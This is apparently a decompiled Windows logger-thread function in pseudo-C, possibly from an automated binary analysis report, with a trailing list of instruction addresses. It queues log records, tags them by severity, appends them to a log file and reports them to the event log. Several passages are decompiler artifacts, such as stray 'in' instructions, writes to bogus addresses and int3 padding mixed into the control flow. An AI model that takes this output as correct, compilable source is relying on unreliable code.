				int* _t578;
				char* _t579;
				long _t588;
				long _t596;
				intOrPtr _t597;
				intOrPtr _t600;
				long _t607;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t612;
				int _t614;
				intOrPtr _t620;
				intOrPtr _t622;
				void* _t623;
				void* _t624;
				void* _t625;
				void** _t627;
				void* _t628;
				void* _t629;
				void* _t630;
				void* _t632;
				int _t633;
				int _t635;
				int* _t637;
				int* _t638;
				signed int _t640;
				void* _t642;
				signed int _t646;
				void* _t647;
				int* _t653;
				int* _t654;
				int* _t656;
				void* _t678;

				_t678 = __fp0;
				_t640 = _t646;
				_push(0xffffffff);
				_push(0x12ea28e);
				_push( *[fs:0x0]);
				_t647 = _t646 - 0x154;
				_t340 =  *0x1309018; // 0xedd8d3b4
				_t341 = _t340 ^ _t640;
				_v20 = _t341;
				_push(__ebx);
				_push(_t629);
				_push(__edi);
				_push(_t341);
				 *[fs:0x0] =  &_v16;
				_t627 = __ecx;
				_v44 = 0;
				_v304 = __ecx | 0xffffffff;
				_v24 = 7;
				_v44 = 0;
				_v8 = 0;
				_v116 = 0;
				_v96 = 7;
				_v116 = 0;
				_v140 = 0;
				_v120 = 7;
				_v140 = 0;
				_v92 = 0;
				_v76 = 0;
				_v72 = 7;
				_v92 = 0;
				asm("xorps xmm0, xmm0");
				_v8 = 3;
				asm("movlpd [ebp-0x140], xmm0");
				while(1) {
					L1:
					_t537 = ReleaseMutex;
					while(1) {
						L2:
						_v28 = 0;
						_t345 =  >=  ? _v44 :  &_v44;
						_v100 = 0;
						_v124 = 0;
						 *( >=  ? _v44 :  &_v44) = 0;
						_t347 =  >=  ? _v116 :  &_v116;
						 *((short*)( >=  ? _v116 :  &_v116)) = 0;
						_t349 =  >=  ? _v140 :  &_v140;
						 *((short*)( >=  ? _v140 :  &_v140)) = 0;
						if(WaitForSingleObject(_t627[0xf], 0xffffffff) != 0) {
							break;
						}
						ReleaseMutex(_t627[0xf]);
						if(_t627[0xd] != 0) {
							ResetEvent(_t627[0x10]);
							_t629 = WaitForSingleObject;
							L22:
							__eflags = WaitForSingleObject(_t627[0xf], 0xffffffff);
							if(__eflags != 0) {
								break;
							} else {
								_t629 = _t627[0xd];
								__eflags = _t629;
								if(__eflags != 0) {
									__eflags = _t629 - _t627[0xe];
									if(_t629 != _t627[0xe]) {
										_t627[0xd] =  *(_t629 + 4);
									} else {
										_t627[0xd] = 0;
										_t627[0xe] = 0;
										SetEvent(_t627[0x11]);
									}
									ReleaseMutex(_t627[0xf]);
									_t537 =  *_t629;
									_push(0xc);
									E012CAE27(_t629);
									_t647 = _t647 + 8;
									__eflags = _t537;
									if(__eflags == 0) {
										break;
									} else {
										_v336 = 0x130b6d4;
										EnterCriticalSection(0x130b6d4);
										_v8 = 4;
										_t629 = 0;
										_t561 = _t627[0x12];
										__eflags = _t627[0x13] - _t561 >> 3;
										if(_t627[0x13] - _t561 >> 3 != 0) {
											do {
												_t528 =  *(_t561 + _t629 * 8);
												__eflags = _t528;
												if(_t528 != 0) {
													 *_t528(_t537,  *((intOrPtr*)(_t561 + 4 + _t629 * 8)));
													_t647 = _t647 + 8;
												}
												_t629 = _t629 + 1;
												_t561 = _t627[0x12];
												__eflags = _t629 - _t627[0x13] - _t561 >> 3;
											} while (_t629 < _t627[0x13] - _t561 >> 3);
										}
										_t417 =  *((intOrPtr*)(_t537 + 0x74));
										_v308 = _t417;
										__eflags = _t417 - 0x80000000;
										if(_t417 == 0x80000000) {
											_v308 = _t627[4];
										}
										__eflags = _t627[2] & 0x00000008;
										_v297 = 0;
										if((_t627[2] & 0x00000008) != 0) {
											_t525 =  *(_t537 + 0x70);
											__eflags = _t525 - 5;
											if(_t525 > 5) {
												_push(6);
												_push(L"UNKNW,");
												goto L46;
											} else {
												switch( *((intOrPtr*)(_t525 * 4 +  &M012AA7E4))) {
													case 0:
														_push(6);
														_push(L"DEBUG,");
														goto L46;
													case 1:
														_push(6);
														_push(L"INFO ,");
														goto L46;
													case 2:
														_push(6);
														__ecx =  &_v44;
														__eax = E01299A40(__ecx, __fp0, L"WARN ,");
														_v297 = 1;
														goto L47;
													case 3:
														_push(6);
														__ecx =  &_v44;
														__eax = E01299A40(__ecx, __fp0, L"ERROR,");
														_v297 = 1;
														goto L47;
													case 4:
														_push(6);
														__ecx =  &_v44;
														__eax = E01299A40(__ecx, __fp0, L"CRTCL,");
														_v297 = 1;
														goto L47;
													case 5:
														_push(6);
														_push(L"NONE ,");
														L46:
														_t561 =  &_v44;
														E01299A40(_t561, _t678);
														goto L47;
												}
											}
										}
										L47:
										_t418 = _v308;
										__eflags = _t418 & 0x00000001;
										if((_t418 & 0x00000001) == 0) {
											L57:
											__eflags = _t627[0xc];
											if(__eflags == 0) {
												__eflags = _t418 & 0x00000002;
												if((_t418 & 0x00000002) == 0) {
													L123:
													_t629 = _v304;
													goto L124;
												} else {
													_t431 = _t627[2];
													__eflags = _t431 & 0x00000001;
													if((_t431 & 0x00000001) == 0) {
														L66:
														__eflags = _t431 & 0x00000008;
														if((_t431 & 0x00000008) != 0) {
															_t505 =  *(_t537 + 0x70);
															__eflags = _t505 - 5;
															if(_t505 > 5) {
																_push(6);
																_push(L"UNKNW,");
															} else {
																switch( *((intOrPtr*)(_t505 * 4 +  &M012AA7FC))) {
																	case 0:
																		_push(6);
																		_push(L"DEBUG,");
																		goto L76;
																	case 1:
																		_push(6);
																		_push(L"INFO ,");
																		goto L76;
																	case 2:
																		_push(6);
																		_push(L"WARN ,");
																		goto L76;
																	case 3:
																		_push(6);
																		_push(L"ERROR,");
																		goto L76;
																	case 4:
																		_push(6);
																		_push(L"CRTCL,");
																		goto L76;
																	case 5:
																		_push(6);
																		_push(L"NONE ,");
																		goto L76;
																}
															}
															L76:
															E01299A40( &_v44, _t678);
														}
														_t432 = _t627[2];
														__eflags = _t432 & 0x00000004;
														if((_t432 & 0x00000004) != 0) {
															__eflags =  *((intOrPtr*)(_t537 + 0x44)) - 8;
															_t499 = _t537 + 0x30;
															_t597 =  *((intOrPtr*)(_t499 + 0x10));
															if( *((intOrPtr*)(_t537 + 0x44)) >= 8) {
																_t499 =  *_t499;
															}
															_push(_t597);
															E01299A40( &_v44, _t678, _t499);
															_push(1);
															E01299A40( &_v44, _t678, ",");
															__eflags =  *((intOrPtr*)(_t537 + 0x2c)) - 8;
															_t502 = _t537 + 0x18;
															_t600 =  *((intOrPtr*)(_t502 + 0x10));
															if( *((intOrPtr*)(_t537 + 0x2c)) >= 8) {
																_t502 =  *_t502;
															}
															_push(_t600);
															E01299A40( &_v44, _t678, _t502);
															_push(1);
															E01299A40( &_v44, _t678, ",");
															_t432 = _t627[2];
														}
														__eflags = _t432 & 0x00000002;
														if(__eflags == 0) {
															L89:
															__eflags = _t432 & 0x00000010;
															if((_t432 & 0x00000010) == 0) {
																L97:
																__eflags =  &_v92 - _t537;
																if( &_v92 != _t537) {
																	__eflags =  *((intOrPtr*)(_t537 + 0x14)) - 8;
																	_t473 = _t537;
																	if( *((intOrPtr*)(_t537 + 0x14)) >= 8) {
																		_t473 =  *_t537;
																	}
																	E012A1EE0(_t537,  &_v92, _t608, _t627, _t629, _t473,  *((intOrPtr*)(_t537 + 0x10)));
																}
																_v344 = L" \t\n\r";
																_v340 = 0x12fcdf4;
																E0129A2D0( &_v64,  &_v344);
																_t653 = _t647 - 0x14;
																_v8 = 7;
																_t436 = _v48;
																_t637 = _t653;
																_t637[4] = _t436;
																_v304 =  &(_t637[4]);
																 *_t637 = 0;
																__eflags = _t436 - 8;
																if(__eflags > 0) {
																	_t570 =  ~(0 | __eflags > 0x00000000) | _t436 * 0x00000002;
																	__eflags = _t570;
																	_push(_t570);
																	_t438 = E012CAE8D(_t537, _t627, _t637, _t570);
																	 *_t637 = _t438;
																	_t653 =  &(_t653[1]);
																	_t571 = _v64;
																	_t637 = _t438;
																	_t436 =  *_v304;
																} else {
																	_t571 =  &_v64;
																}
																E012CC800(_t637, _t571, _t436 + _t436);
																_t654 =  &(_t653[3]);
																E012A8E30(_t537,  &_v92);
																_t443 = _v48;
																_t638 = _t654;
																_t638[4] = _t443;
																_v304 =  &(_t638[4]);
																 *_t638 = 0;
																__eflags = _t443 - 8;
																if(__eflags > 0) {
																	_t577 =  ~(0 | __eflags > 0x00000000) | _t443 * 0x00000002;
																	__eflags = _t577;
																	_push(_t577);
																	_t445 = E012CAE8D(_t537, _t627, _t638, _t577);
																	 *_t638 = _t445;
																	_t654 =  &(_t654[1]);
																	_t578 = _v64;
																	_t638 = _t445;
																	_t443 =  *_v304;
																} else {
																	_t578 =  &_v64;
																}
																E012CC800(_t638, _t578, _t443 + _t443);
																_t579 =  &_v92;
																E012AABF0(_t579);
																_t656 =  &(_t654[8]);
																_v8 = 4;
																__eflags = _v48 - 8;
																if(_v48 > 8) {
																	_t471 = _v64;
																	__eflags = _t471;
																	if(_t471 != 0) {
																		E012CAE58(_t471);
																		_t656 =  &(_t656[1]);
																	}
																}
																_push(_t579);
																E012AAA10( &_v92);
																__eflags = _v72 - 8;
																_t452 =  >=  ? _v92 :  &_v92;
																_push(_v76);
																E01299A40( &_v44, _t678,  >=  ? _v92 :  &_v92);
																E012AAAB0( &_v44, "\r");
																_t608 = "\n";
																E012AAAB0( &_v44, "\n");
																_push(2);
																E01299A40( &_v44, _t678, L"\r\n");
																_t561 =  &(_t627[5]);
																_t457 = E012C5F50(_t537, _t561, __eflags, _t678);
																_t647 =  &(_t656[1]) - 8 + 8;
																_v304 = _t457;
																__eflags = _t457 - 0xffffffff;
																if(_t457 == 0xffffffff) {
																	goto L123;
																} else {
																	_t561 =  &_v324;
																	__imp__GetFileSizeEx(_t457, _t561);
																	__eflags = _t457;
																	if(_t457 == 0) {
																		goto L123;
																	} else {
																		_t561 = _v320;
																		_t458 = _t627[0xb];
																		__eflags = _t561;
																		if(__eflags < 0) {
																			L118:
																			_t629 = _v304;
																			goto L119;
																		} else {
																			if(__eflags > 0) {
																				L115:
																				_t561 = _v304;
																				_t608 =  &(_t627[5]);
																				_t629 = E012C6600(_t537, _t561,  &(_t627[5]), _t627, _t638, __eflags, _t678);
																				_v304 = _t629;
																				__eflags = _t629 - 0xffffffff;
																				if(_t629 != 0xffffffff) {
																					_t470 =  &_v324;
																					__imp__GetFileSizeEx(_t629, _t470);
																					__eflags = _t470;
																					if(_t470 != 0) {
																						_t561 = _v320;
																						L119:
																						_t460 = _v324 | _t561;
																						__eflags = _t460;
																						if(_t460 == 0) {
																							_v312 = 0xfeff;
																							WriteFile(_t629,  &_v312, 2,  &_v328, _t460);
																						}
																						_push(2);
																						asm("xorps xmm0, xmm0");
																						asm("movlpd [ebp-0x138], xmm0");
																						_t461 = SetFilePointerEx(_t629, _v316, _v312, 0);
																						__eflags = _t461;
																						if(_t461 != 0) {
																							_t608 =  &_v328;
																							__eflags = _v24 - 8;
																							_t561 = _v28 + _v28;
																							_t464 =  >=  ? _v44 :  &_v44;
																							WriteFile(_t629,  >=  ? _v44 :  &_v44, _t561,  &_v328, 0);
																						}
																					}
																				}
																			} else {
																				__eflags = _v324 - _t458;
																				if(__eflags <= 0) {
																					goto L118;
																				} else {
																					goto L115;
																				}
																			}
																		}
																	}
																}
																L124:
																CloseHandle(_t629);
																__eflags =  *_t627;
																if( *_t627 != 0) {
																	_t420 = _v308;
																	__eflags = _t420 & 0x00000004;
																	if((_t420 & 0x00000004) != 0) {
																		__eflags =  *(_t537 + 0x70) - 1;
																		if( *(_t537 + 0x70) >= 1) {
																			__eflags =  &_v44 - _t537;
																			if( &_v44 != _t537) {
																				__eflags =  *((intOrPtr*)(_t537 + 0x14)) - 8;
																				_t429 = _t537;
																				if( *((intOrPtr*)(_t537 + 0x14)) >= 8) {
																					_t429 =  *_t537;
																				}
																				_t561 =  &_v44;
																				E012A1EE0(_t537, _t561, _t608, _t627, _t629, _t429,  *((intOrPtr*)(_t537 + 0x10)));
																			}
																			_push(_t561);
																			E012AAB50( &_v44);
																			_t423 =  *(_t537 + 0x70);
																			_t647 = _t647 + 4;
																			__eflags = _t423 - 1;
																			if(_t423 > 1) {
																				__eflags = _t423 - 2;
																				if(_t423 > 2) {
																					_t564 = 0x65;
																					_t614 = 1;
																				} else {
																					_t564 = 0x66;
																					_t614 = 2;
																				}
																			} else {
																				_t564 = 0x67;
																				_t614 = 4;
																			}
																			__eflags = _v24 - 8;
																			_t425 =  >=  ? _v44 :  &_v44;
																			_v332 =  >=  ? _v44 :  &_v44;
																			_t427 = ReportEventW( *_t627, _t614, 0, _t564, 0, 1, 0,  &_v332, 0);
																			__eflags = _t427;
																			if(_t427 == 0) {
																				GetLastError();
																			}
																		}
																	}
																}
																L147();
																_push(0x78);
																_t362 = E012CAE27(_t537);
																_t647 = _t647 + 8;
																_v8 = 3;
																goto L139;
															} else {
																_t620 =  *((intOrPtr*)(_t537 + 0x58));
																_t546 = _t537 + 0x48;
																__eflags = 0x7ffffffe - _t620 - 1;
																if(0x7ffffffe - _t620 < 1) {
																	goto L144;
																} else {
																	__eflags =  *((intOrPtr*)(_t546 + 0x14)) - 8;
																	if( *((intOrPtr*)(_t546 + 0x14)) >= 8) {
																		_t546 =  *_t546;
																	}
																	E01299780( &_v68, _v336, _t546, _t546, _t620, ",", 1);
																	_v8 = 6;
																	__eflags = _v48 - 8;
																	_push(_v52);
																	_t479 =  >=  ? _v68 :  &_v68;
																	E01299A40( &_v44, _t678,  >=  ? _v68 :  &_v68);
																	_v8 = 4;
																	_t608 = _v48;
																	__eflags = _t608 - 8;
																	if(_t608 < 8) {
																		goto L97;
																	} else {
																		_t588 = _v68;
																		_t608 = 2 + _t608 * 2;
																		_t481 = _t588;
																		__eflags = _t608 - 0x1000;
																		if(_t608 < 0x1000) {
																			L96:
																			_push(_t608);
																			E012CAE27(_t588);
																			_t647 = _t647 + 8;
																			goto L97;
																		} else {
																			_t546 =  *(_t588 - 4);
																			_t612 = _t608 + 0x23;
																			__eflags = _t481 - _t546 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L143;
																			} else {
																				goto L96;
																			}
																		}
																	}
																}
															}
														} else {
															_t485 = E012986F0( &_v296, __eflags, L"%d,");
															_v8 = 5;
															_v356 = _t537 + 0x60;
															_v352 = E01298060;
															_v348 =  &M012AADD0;
															L0129A0B0(E0129BDD0(_t537, _t485,  &_v356, _t627), _t678,  &_v68);
															E012982B0(_t537,  &_v116,  &_v68);
															_t608 = _v48;
															__eflags = _t608 - 8;
															if(_t608 < 8) {
																L88:
																_v8 = 4;
																E01297850( &_v296, _t627, _t629);
																__eflags = _v96 - 8;
																_push(_v100);
																_t493 =  >=  ? _v116 :  &_v116;
																E01299A40( &_v44, _t678,  >=  ? _v116 :  &_v116);
																_t432 = _t627[2];
																goto L89;
															} else {
																_t596 = _v68;
																_t608 = 2 + _t608 * 2;
																_t495 = _t596;
																__eflags = _t608 - 0x1000;
																if(_t608 < 0x1000) {
																	L87:
																	_push(_t608);
																	E012CAE27(_t596);
																	_t647 = _t647 + 8;
																	goto L88;
																} else {
																	_t546 =  *(_t596 - 4);
																	_t612 = _t608 + 0x23;
																	__eflags = _t495 - _t546 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L143;
																	} else {
																		goto L87;
																	}
																}
															}
														}
													} else {
														_t507 = E012A90C0(_t537,  &_v68, _t627, _t629, _t678,  *((intOrPtr*)(_t537 + 0x68)),  *((intOrPtr*)(_t537 + 0x6c)));
														_t647 = _t647 + 8;
														E012982B0(_t537,  &_v44, _t507);
														_t608 = _v48;
														__eflags = _t608 - 8;
														if(_t608 < 8) {
															L65:
															_push(1);
															E01299A40( &_v44, _t678, ",");
															_t431 = _t627[2];
															goto L66;
														} else {
															_t607 = _v68;
															_t608 = 2 + _t608 * 2;
															_t510 = _t607;
															__eflags = _t608 - 0x1000;
															if(_t608 < 0x1000) {
																L64:
																_push(_t608);
																E012CAE27(_t607);
																_t647 = _t647 + 8;
																goto L65;
															} else {
																_t546 =  *(_t607 - 4);
																_t612 = _t608 + 0x23;
																__eflags = _t510 - _t546 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L143;
																} else {
																	goto L64;
																}
															}
														}
													}
												}
											} else {
												_v8 = 3;
												LeaveCriticalSection(0x130b6d4);
												goto L1;
											}
										} else {
											_t514 = E012D0C2A(1);
											_t647 = _t647 + 4;
											_t629 = _t514;
											__eflags = _v297;
											if(_v297 != 0) {
												_t524 = E012D0C2A(2);
												_t647 = _t647 + 4;
												_t629 = _t524;
											}
											_t561 =  &_v68;
											E012983B0(_t561, _t537);
											__eflags =  *0x130b6b4;
											if( *0x130b6b4 == 0) {
												__eflags = _v48 - 8;
												_t522 =  >=  ? _v68 :  &_v68;
												E012A9090(_t629, L"%s\n",  >=  ? _v68 :  &_v68);
												_t647 = _t647 + 0xc;
											}
											_t608 = _v48;
											__eflags = _t608 - 8;
											if(_t608 < 8) {
												L56:
												_t418 = _v308 & 0xfffffffe;
												__eflags = _t418;
												_v308 = _t418;
												goto L57;
											} else {
												_t561 = _v68;
												_t608 = 2 + _t608 * 2;
												_t517 = _t561;
												__eflags = _t608 - 0x1000;
												if(_t608 < 0x1000) {
													L55:
													_push(_t608);
													E012CAE27(_t561);
													_t647 = _t647 + 8;
													goto L56;
												} else {
													_t546 =  *(_t561 - 4);
													_t612 = _t608 + 0x23;
													__eflags = _t517 - _t546 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														L143:
														E012CF35F(_t537, _t546, _t612, __eflags);
														L144:
														E012A1D70(_t546);
														asm("in al, 0xa0");
														asm("cld");
														_t362 =  *0xa114012a -  *_t546;
														__eflags = _t362;
														if(_t362 < 0) {
															L139:
															asm("cld");
															_t640 = _t640 +  *((intOrPtr*)(_t362 - 0x2c));
															__eflags = _t640;
															goto L140;
														} else {
															_t363 = _t362 -  *_t546;
															__eflags = _t363;
															if(__eflags != 0) {
																L140:
																_t608 = 0x30;
																_t627 = _t627 + _t627;
																asm("adc eax, 0x12ee0bc");
																while(1) {
																	L1:
																	_t537 = ReleaseMutex;
																	goto L2;
																}
															} else {
																_t364 = _t363 -  *_t546;
																__eflags =  *0xFFFFFFFF658E2BCA & _t364;
																_t632 = _t364 -  *_t546;
																 *0xa29f012a = _t629;
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t632);
																_t633 = _t546;
																_t547 =  *(_t633 + 0x5c);
																__eflags = _t547 - 8;
																if(_t547 < 8) {
																	L152:
																	 *(_t633 + 0x58) = 0;
																	 *(_t633 + 0x5c) = 7;
																	 *((short*)(_t633 + 0x48)) = 0;
																	_t548 =  *(_t633 + 0x44);
																	__eflags = _t548 - 8;
																	if(_t548 < 8) {
																		L157:
																		 *(_t633 + 0x40) = 0;
																		 *(_t633 + 0x44) = 7;
																		 *((short*)(_t633 + 0x30)) = 0;
																		_t549 =  *(_t633 + 0x2c);
																		__eflags = _t549 - 8;
																		if(_t549 < 8) {
																			L162:
																			 *(_t633 + 0x28) = 0;
																			 *(_t633 + 0x2c) = 7;
																			 *((short*)(_t633 + 0x18)) = 0;
																			_t550 =  *(_t633 + 0x14);
																			__eflags = _t550 - 8;
																			if(_t550 < 8) {
																				L167:
																				__eflags = 0;
																				 *(_t633 + 0x10) = 0;
																				 *(_t633 + 0x14) = 7;
																				 *_t633 = 0;
																				return 0;
																			} else {
																				_t372 =  *_t633;
																				_t551 = 2 + _t550 * 2;
																				__eflags = _t551 - 0x1000;
																				if(_t551 < 0x1000) {
																					L166:
																					_push(_t551);
																					E012CAE27(_t372);
																					goto L167;
																				} else {
																					_t622 =  *((intOrPtr*)(_t372 - 4));
																					_t551 = _t551 + 0x23;
																					__eflags = _t372 - _t622 + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						goto L168;
																					} else {
																						_t372 = _t622;
																						goto L166;
																					}
																				}
																			}
																		} else {
																			_t386 =  *((intOrPtr*)(_t633 + 0x18));
																			_t555 = 2 + _t549 * 2;
																			__eflags = _t555 - 0x1000;
																			if(_t555 < 0x1000) {
																				L161:
																				_push(_t555);
																				E012CAE27(_t386);
																				_t647 = _t647 + 8;
																				goto L162;
																			} else {
																				_t622 =  *((intOrPtr*)(_t386 - 4));
																				_t551 = _t555 + 0x23;
																				__eflags = _t386 - _t622 + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L168;
																				} else {
																					_t386 = _t622;
																					goto L161;
																				}
																			}
																		}
																	} else {
																		_t390 =  *((intOrPtr*)(_t633 + 0x30));
																		_t556 = 2 + _t548 * 2;
																		__eflags = _t556 - 0x1000;
																		if(_t556 < 0x1000) {
																			L156:
																			_push(_t556);
																			E012CAE27(_t390);
																			_t647 = _t647 + 8;
																			goto L157;
																		} else {
																			_t622 =  *((intOrPtr*)(_t390 - 4));
																			_t551 = _t556 + 0x23;
																			__eflags = _t390 - _t622 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L168;
																			} else {
																				_t390 = _t622;
																				goto L156;
																			}
																		}
																	}
																} else {
																	_t394 =  *((intOrPtr*)(_t633 + 0x48));
																	_t557 = 2 + _t547 * 2;
																	__eflags = _t557 - 0x1000;
																	if(_t557 < 0x1000) {
																		L151:
																		_push(_t557);
																		E012CAE27(_t394);
																		_t647 = _t647 + 8;
																		goto L152;
																	} else {
																		_t622 =  *((intOrPtr*)(_t394 - 4));
																		_t551 = _t557 + 0x23;
																		__eflags = _t394 - _t622 + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			L168:
																			E012CF35F(_t537, _t551, _t622, __eflags);
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			_push(_t640);
																			_t642 = _t647;
																			_t552 = _v372;
																			__eflags = _t552;
																			if(_t552 == 0) {
																				_v0 = L"StartLoggerThreadProc: arg0==NULL";
																				E012CCD74( &_v0, 0x1307820);
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				_push(_t642);
																				_push(_t633);
																				_t635 = _t552;
																				_t379 = WaitForSingleObject( *(_t635 + 8), 0xffffffff);
																				__eflags = _t379;
																				if(__eflags == 0) {
																					_push(0xc);
																					_t380 = E012CAE5D(_t537, _t627, _t635, __eflags);
																					 *_t380 = _v4;
																					 *(_t380 + 4) = 0;
																					_t554 =  *(_t635 + 4);
																					__eflags = _t554;
																					if(_t554 != 0) {
																						 *(_t554 + 4) = _t380;
																						_t554 =  *(_t635 + 4);
																					}
																					 *(_t380 + 8) = _t554;
																					__eflags =  *_t635;
																					 *(_t635 + 4) = _t380;
																					if( *_t635 == 0) {
																						 *_t635 = _t380;
																					}
																					ResetEvent( *(_t635 + 0x10));
																					ReleaseMutex( *(_t635 + 8));
																					_t379 = SetEvent( *(_t635 + 0xc));
																				}
																				return _t379;
																			} else {
																				E012A9DB0(_t537, _t552, _t627, _t678); // executed
																				E012D431D(_t537, _t627, _t633, __eflags); // executed
																				__eflags = 0;
																				return 0;
																			}
																		} else {
																			_t394 = _t622;
																			goto L151;
																		}
																	}
																}
															}
														}
													} else {
														goto L55;
													}
												}
											}
										}
									}
								} else {
									 *_t537(_t627[0xf]);
									continue;
								}
							}
						} else {
							_t629 = WaitForSingleObject;
							if(WaitForSingleObject(_t627[0x10], 0xffffffff) == 0) {
								goto L22;
							} else {
								break;
							}
						}
						L179:
					}
					_t609 = _v72;
					if(_t609 < 8) {
						L9:
						_t610 = _v120;
						_t351 = 0;
						_v76 = 0;
						_v72 = 7;
						_v92 = 0;
						if(_t610 < 8) {
							L13:
							_t611 = _v96;
							if(_t611 < 8) {
								L17:
								_t612 = _v24;
								if(_t612 < 8) {
									L142:
									 *[fs:0x0] = _v16;
									_pop(_t628);
									_pop(_t630);
									_pop(_t538);
									return E012CAE19(_t351, _t538, _v20 ^ _t640, _t612, _t628, _t630);
								} else {
									_t546 = _v44;
									_t612 = 2 + _t612 * 2;
									_t353 = _t546;
									if(_t612 < 0x1000) {
										L141:
										_push(_t612);
										_t351 = E012CAE27(_t546);
										goto L142;
									} else {
										_t546 =  *(_t546 - 4);
										_t612 = _t612 + 0x23;
										if(_t353 - _t546 + 0xfffffffc > 0x1f) {
											goto L143;
										} else {
											goto L141;
										}
									}
								}
							} else {
								_t558 = _v116;
								_t623 = 2 + _t611 * 2;
								_t398 = _t558;
								if(_t623 < 0x1000) {
									L16:
									_push(_t623);
									_t351 = E012CAE27(_t558);
									_t647 = _t647 + 8;
									goto L17;
								} else {
									_t546 =  *(_t558 - 4);
									_t612 = _t623 + 0x23;
									if(_t398 - _t546 + 0xfffffffc > 0x1f) {
										goto L143;
									} else {
										goto L16;
									}
								}
							}
						} else {
							_t559 = _v140;
							_t624 = 2 + _t610 * 2;
							_t401 = _t559;
							if(_t624 < 0x1000) {
								L12:
								_push(_t624);
								_t351 = E012CAE27(_t559);
								_t647 = _t647 + 8;
								goto L13;
							} else {
								_t546 =  *(_t559 - 4);
								_t612 = _t624 + 0x23;
								if(_t401 - _t546 + 0xfffffffc > 0x1f) {
									goto L143;
								} else {
									goto L12;
								}
							}
						}
					} else {
						_t560 = _v92;
						_t625 = 2 + _t609 * 2;
						_t404 = _t560;
						if(_t625 < 0x1000) {
							L8:
							_push(_t625);
							E012CAE27(_t560);
							_t647 = _t647 + 8;
							goto L9;
						} else {
							_t546 =  *(_t560 - 4);
							_t612 = _t625 + 0x23;
							if(_t404 - _t546 + 0xfffffffc > 0x1f) {
								goto L143;
							} else {
								goto L8;
							}
						}
					}
					goto L179;
				}
			}

















































































































































              0x012a9db0
              0x012a9db1
              0x012a9db3
              0x012a9db5
              0x012a9dc0
              0x012a9dc1
              0x012a9dc7
              0x012a9dcc
              0x012a9dce
              0x012a9dd1
              0x012a9dd2
              0x012a9dd3
              0x012a9dd4
              0x012a9dd8
              0x012a9dde
              0x012a9de3
              0x012a9dec
              0x012a9df2
              0x012a9df9
              0x012a9dfd
              0x012a9e00
              0x012a9e03
              0x012a9e0a
              0x012a9e0e
              0x012a9e14
              0x012a9e1b
              0x012a9e22
              0x012a9e25
              0x012a9e28
              0x012a9e2f
              0x012a9e33
              0x012a9e36
              0x012a9e3a
              0x012a9e42
              0x012a9e42
              0x012a9e42
              0x012a9e50
              0x012a9e50
              0x012a9e57
              0x012a9e5e
              0x012a9e68
              0x012a9e6b
              0x012a9e6e
              0x012a9e74
              0x012a9e7e
              0x012a9e87
              0x012a9e8e
              0x012a9e9c
              0x00000000
              0x00000000
              0x012a9ea4
              0x012a9ea8
              0x012a9fc8
              0x012a9fce
              0x012a9fd4
              0x012a9fdb
              0x012a9fdd
              0x00000000
              0x012a9fe3
              0x012a9fe3
              0x012a9fe6
              0x012a9fe8
              0x012a9ff4
              0x012a9ff7
              0x012aa015
              0x012a9ff9
              0x012a9ffc
              0x012aa003
              0x012aa00a
              0x012aa00a
              0x012aa01b
              0x012aa01d
              0x012aa01f
              0x012aa022
              0x012aa027
              0x012aa02a
              0x012aa02c
              0x00000000
              0x012aa032
              0x012aa037
              0x012aa041
              0x012aa047
              0x012aa04b
              0x012aa050
              0x012aa058
              0x012aa05a
              0x012aa060
              0x012aa060
              0x012aa063
              0x012aa065
              0x012aa06c
              0x012aa06e
              0x012aa06e
              0x012aa074
              0x012aa075
              0x012aa07d
              0x012aa07d
              0x012aa060
              0x012aa081
              0x012aa084
              0x012aa08a
              0x012aa08f
              0x012aa094
              0x012aa094
              0x012aa09a
              0x012aa09e
              0x012aa0a5
              0x012aa0ab
              0x012aa0ae
              0x012aa0b1
              0x012aa11d
              0x012aa11f
              0x00000000
              0x012aa0b3
              0x012aa0b3
              0x00000000
              0x012aa0ba
              0x012aa0bc
              0x00000000
              0x00000000
              0x012aa0c3
              0x012aa0c5
              0x00000000
              0x00000000
              0x012aa0cc
              0x012aa0d3
              0x012aa0d6
              0x012aa0db
              0x00000000
              0x00000000
              0x012aa0e4
              0x012aa0eb
              0x012aa0ee
              0x012aa0f3
              0x00000000
              0x00000000
              0x012aa0fc
              0x012aa103
              0x012aa106
              0x012aa10b
              0x00000000
              0x00000000
              0x012aa114
              0x012aa116
              0x012aa124
              0x012aa124
              0x012aa127
              0x00000000
              0x00000000
              0x012aa0b3
              0x012aa0b1
              0x012aa12c
              0x012aa12c
              0x012aa132
              0x012aa134
              0x012aa1d0
              0x012aa1d0
              0x012aa1d4
              0x012aa1ea
              0x012aa1ec
              0x012aa6d6
              0x012aa6d6
              0x00000000
              0x012aa1f2
              0x012aa1f2
              0x012aa1f5
              0x012aa1f7
              0x012aa25f
              0x012aa25f
              0x012aa261
              0x012aa263
              0x012aa266
              0x012aa269
              0x012aa2a8
              0x012aa2aa
              0x012aa26b
              0x012aa26b
              0x00000000
              0x012aa272
              0x012aa274
              0x00000000
              0x00000000
              0x012aa27b
              0x012aa27d
              0x00000000
              0x00000000
              0x012aa284
              0x012aa286
              0x00000000
              0x00000000
              0x012aa28d
              0x012aa28f
              0x00000000
              0x00000000
              0x012aa296
              0x012aa298
              0x00000000
              0x00000000
              0x012aa29f
              0x012aa2a1
              0x00000000
              0x00000000
              0x012aa26b
              0x012aa2af
              0x012aa2b2
              0x012aa2b2
              0x012aa2b7
              0x012aa2ba
              0x012aa2bc
              0x012aa2be
              0x012aa2c2
              0x012aa2c5
              0x012aa2c8
              0x012aa2ca
              0x012aa2ca
              0x012aa2cc
              0x012aa2d1
              0x012aa2d6
              0x012aa2e0
              0x012aa2e5
